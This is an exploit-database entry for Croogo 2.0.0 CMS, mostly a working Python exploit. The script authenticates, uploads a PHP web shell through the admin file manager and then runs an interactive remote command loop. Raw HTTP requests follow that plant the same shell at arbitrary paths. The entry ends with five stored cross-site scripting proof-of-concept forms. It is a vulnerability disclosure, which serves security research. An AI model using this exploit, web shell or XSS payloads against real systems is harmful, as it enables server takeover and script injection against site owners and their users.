Croogo 2.0.0 Arbitrary PHP Code Execution / Cross Site Scripting Vulnerabilities

2014-10-13T00:00:00
ID 1337DAY-ID-22749
Type zdt
Reporter LiquidWorm
Modified 2014-10-13T00:00:00

Description

Croogo version 2.0.0 remote arbitrary PHP code execution and multiple stored cross site scripting vulnerabilities.

                                        
                                            #!/usr/bin/env python
#
#
# Croogo 2.0.0 Arbitrary PHP Code Execution Exploit
#
#
# Vendor: Fahad Ibnay Heylaal
# Product web page: http://www.croogo.org
# Affected version: 2.0.0
#
# Summary: Croogo is a free, open source, content management system
# for PHP, released under The MIT License. It is powered by CakePHP
# MVC framework.
#
# Desc: Croogo suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper
# verification of uploaded files in '/admin/file_manager/attachments/add'
# script thru the 'data[Attachment][file]' POST parameter and in
# '/admin/file_manager/file_manager/upload' script thru the
# 'data[FileManager][file]' POST parameter. This can be exploited
# to execute arbitrary PHP code by uploading a malicious PHP script
# file that will be stored in '/webroot/uploads/' directory.
#
# Tested on: Apache/2.4.7 (Win32)
#            PHP/5.5.6
#            MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5202
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5202.php
#
# Vendor: http://blog.croogo.org/blog/croogo-210-released
#
#
# 26.07.2014
#
#

version = '5.0.0.251'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
  print '''
 @[email protected]
 |                                                               |
 |       Croogo 2.0.0 Arbitrary PHP Code Execution Exploit       |
 |                                                               |
 |                                                               |
 |                       ID: ZSL-2014-5202                       |
 |                                                               |
 |              Copyleft (c) 2014, Zero Science Lab              |
 |                                                               |
 @[email protected]
          '''
  if len(sys.argv) < 3:
    print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
    print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk croogo\n'
    sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]
path = sys.argv[2]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

try:
  getcsrf = opener.open('http://'+host+'/'+path+'/admin/users/users/login')
  csrf = getcsrf.read()
except urllib2.HTTPError, errorzio:
  if errorzio.code == 404:
    print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
    print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
    print
    sys.exit()
except URLError, errorziocvaj:
  if errorziocvaj.reason:
    print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
    print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
    print
    sys.exit()

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET

token_key = re.search(r'\[key\]\" value=\"(.+?)\"', csrf).group(1)
print '\x20\x20[*] Retrieving login CSRF token '+'.'*27+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login CSRF token: '+Fore.YELLOW+token_key+Fore.RESET

print '\x20\x20[*] Login please.'

username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')


login_data = urllib.urlencode({
              '_method' : 'POST',
              'data[User][password]' : password,
              'data[User][remember]' : '0',
              'data[User][username]' : username,
              'data[_Token][fields]' : '93365ba06ce101995d3cd9c79cce968b12fb6ee5:',
              'data[_Token][key]' : token_key,
              'data[_Token][unlocked]' : ''
              })


login = opener.open('http://'+host+'/'+path+'/admin/users/users/login', login_data)
auth = login.read()

for session in cj:
  sessid = session.name

print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET

if re.search(r'Incorrect username or password', auth):
  print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
  print
  sys.exit()
else:
  print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET

getcsrfattach = opener.open('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
csrfattach = getcsrfattach.read()
token_key2 = re.search(r'\[key\]\" value=\"(.+?)\"', csrfattach).group(1)
print '\x20\x20[*] Retrieving upload CSRF token '+'.'*26+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Upload CSRF token: '+Fore.YELLOW+token_key2+Fore.RESET

class MultiPartForm(object):

    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
    
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return

    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
    
    def __str__(self):

        parts = []
        part_boundary = '--' + self.boundary
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
        
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)

if __name__ == '__main__':

    form = MultiPartForm()
    form.add_field('_method', 'POST')
    form.add_field('data[_Token][key]', token_key2)
    form.add_field('data[_Token][fields]', 'c0c3f5d102d9672429f5c571a5f45c34255a93a9%3A')
    form.add_field('data[_Token][unlocked]', '')
    
    form.add_file('data[Attachment][file]', 'zsl.php', 
                  fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))

    request = urllib2.Request('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
    request.add_header('User-agent', 'joxypoxy 5.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()
    print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET


print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)

furl = '/uploads/zsl.php'
#furl = '/webroot/uploads/zsl.php'

print
today = datetime.date.today()
fname = 'croogo-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)

logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: Croogo 2.0.0 Arbitrary PHP Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5202')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
  try:
    cmd = raw_input(Fore.RED+'[email protected]'+host+':~# '+Fore.RESET)
    execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
    reverse = execute.read()
    pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)

    print Style.BRIGHT+Fore.CYAN
    cmdout = pattern.match(reverse)
    print cmdout.groups()[0].strip()
    print Style.RESET_ALL+Fore.RESET

    if cmd.strip() == 'exit':
      break

    logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
  except Exception:
    break

logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print

sys.exit()

#
## OTHER ##
#
#
# Arbitrary file creation any location:
#
# - http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A\xampp\htdocs\croogo\
#
#
# Arbitrary file upload any location:
# - http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5C
#
#
###########
#
# POST /croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 229
#
# _method=POST&data%5B_Token%5D%5Bkey%5D=4f20867747cbff33951db804266494804e96bf89&data%5BFileManager%5D%5Bname%5D=shell2.php&data%5B_Token%5D%5Bfields%5D=4aeda1af05803a2ae8503d6033160c17d6335641%253A&data%5B_Token%5D%5Bunlocked%5D=
#
###########
#
# POST /croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 304
#
# _method=POST&data%5B_Token%5D%5Bkey%5D=5a6516e263eb6e5504e2266783b42cd08e3efe16&data%5BFileManager%5D%5Bcontent%5D=test%0D%0A%3C%3Fphp%0D%0Apassthru%28%24_GET%5B%27cmd%27%5D%29%3B%0D%0A%3F%3E%0D%0A&data%5B_Token%5D%5Bfields%5D=8f1bb3e7acda642ca69ee0430abba1f5ecd5f7a7%253A&data%5B_Token%5D%5Bunlocked%5D=
#
###########
#
# POST /croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: multipart/form-data; boundary=---------------------------25555888422431
# Content-Length: 779
#
# -----------------------------25555888422431
# Content-Disposition: form-data; name="_method"
#
# POST
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][key]"
#
# 0d940d3b3f4c80ea98b3e5588c337587f7c50d5e
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[FileManager][file]"; filename="exploit.php"
# Content-Type: application/octet-stream
#
# test
# <?php
# passthru($_GET['cmd']);
# ?>
#
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][fields]"
#
# 6f3f788048d33beefcc340fe281cf758e20ad329%3A
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][unlocked]"
#
#
# -----------------------------25555888422431--
#
#

<<<

Croogo 2.0.0 Multiple Stored XSS Vulnerabilities


Vendor: Fahad Ibnay Heylaal
Product web page: http://www.croogo.org
Affected version: 2.0.0

Summary: Croogo is a free, open source, content management system
for PHP, released under The MIT License. It is powered by CakePHP
MVC framework.

Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
scripting vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - http://www.zeroscience.mk
Macedonian Information Security Research And Development Laboratory


Advisory ID: ZSL-2014-5201
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php

Vendor: http://blog.croogo.org/blog/croogo-210-released


26.07.2014

>>>


------------------------
(XSS #1)
--------
POST parameters:

 - data[Contact][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
      <input type="hidden" name="data[Contact][id]" value="" />
      <input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS");</script>" />
      <input type="hidden" name="data[Contact][alias]" value="test" />
      <input type="hidden" name="data[Contact][email]" value="[email protected]" />
      <input type="hidden" name="data[Contact][body]" value="" />
      <input type="hidden" name="data[Contact][name]" value="" />
      <input type="hidden" name="data[Contact][position]" value="" />
      <input type="hidden" name="data[Contact][address]" value="" />
      <input type="hidden" name="data[Contact][address2]" value="" />
      <input type="hidden" name="data[Contact][state]" value="" />
      <input type="hidden" name="data[Contact][country]" value="" />
      <input type="hidden" name="data[Contact][postcode]" value="" />
      <input type="hidden" name="data[Contact][phone]" value="" />
      <input type="hidden" name="data[Contact][fax]" value="" />
      <input type="hidden" name="data[Contact][message_status]" value="0" />
      <input type="hidden" name="data[Contact][message_archive]" value="0" />
      <input type="hidden" name="data[Contact][message_notify]" value="0" />
      <input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
      <input type="hidden" name="data[Contact][message_captcha]" value="0" />
      <input type="hidden" name="data[Contact][status]" value="0" />
      <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #2)
--------
POST/PUT parameters:

 - data[Block][title]
 - data[Block][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
      <input type="hidden" name="_method" value="PUT" />
      <input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
      <input type="hidden" name="data[Block][id]" value="10" />
      <input type="hidden" name="data[Block][title]" value=""><script>alert(2);</script>" />
      <input type="hidden" name="data[Block][alias]" value=""><script>alert(3);</script>" />
      <input type="hidden" name="data[Block][region_id]" value="3" />
      <input type="hidden" name="data[Block][body]" value="1" />
      <input type="hidden" name="data[Block][class]" value="1" />
      <input type="hidden" name="data[Block][element]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Block][visibility_paths]" value="" />
      <input type="hidden" name="data[Block][params]" value="1" />
      <input type="hidden" name="data[Block][status]" value="1" />
      <input type="hidden" name="data[Block][show_title]" value="0" />
      <input type="hidden" name="data[Block][show_title]" value="1" />
      <input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #3)
--------
POST parameters:

 - data[Region][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
      <input type="hidden" name="data[Region][id]" value="" />
      <input type="hidden" name="data[Region][title]" value=""><script>alert(11);</script>" />
      <input type="hidden" name="data[Region][alias]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #4)
--------
POST parameters:

 - data[Menu][title]
 - data[Menu][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
      <input type="hidden" name="data[Menu][id]" value="" />
      <input type="hidden" name="data[Menu][title]" value=""><script>alert(22);</script>" />
      <input type="hidden" name="data[Menu][alias]" value=""><script>alert(33);</script>" />
      <input type="hidden" name="data[Menu][description]" value="ZSL" />
      <input type="hidden" name="data[Menu][params]" value="1" />
      <input type="hidden" name="data[Menu][status]" value="1" />
      <input type="hidden" name="data[Menu][publish_start]" value="1" />
      <input type="hidden" name="data[Menu][publish_end]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #5)
--------
POST parameters:

 - data[Link][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
      <input type="hidden" name="data[Link][id]" value="" />
      <input type="hidden" name="data[Link][menu_id]" value="6" />
      <input type="hidden" name="data[Link][parent_id]" value="" />
      <input type="hidden" name="data[Link][title]" value=""><script>alert(1);</script>" />
      <input type="hidden" name="data[Link][link]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Link][class]" value="scriptalert1script" />
      <input type="hidden" name="data[Link][description]" value="" />
      <input type="hidden" name="data[Link][rel]" value="" />
      <input type="hidden" name="data[Link][target]" value="" />
      <input type="hidden" name="data[Link][params]" value="" />
      <input type="hidden" name="data[Link][status]" value="0" />
      <input type="hidden" name="data[Link][publish_start]" value="" />
      <input type="hidden" name="data[Link][publish_end]" value="" />
      <input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

#  0day.today [2018-02-20]  #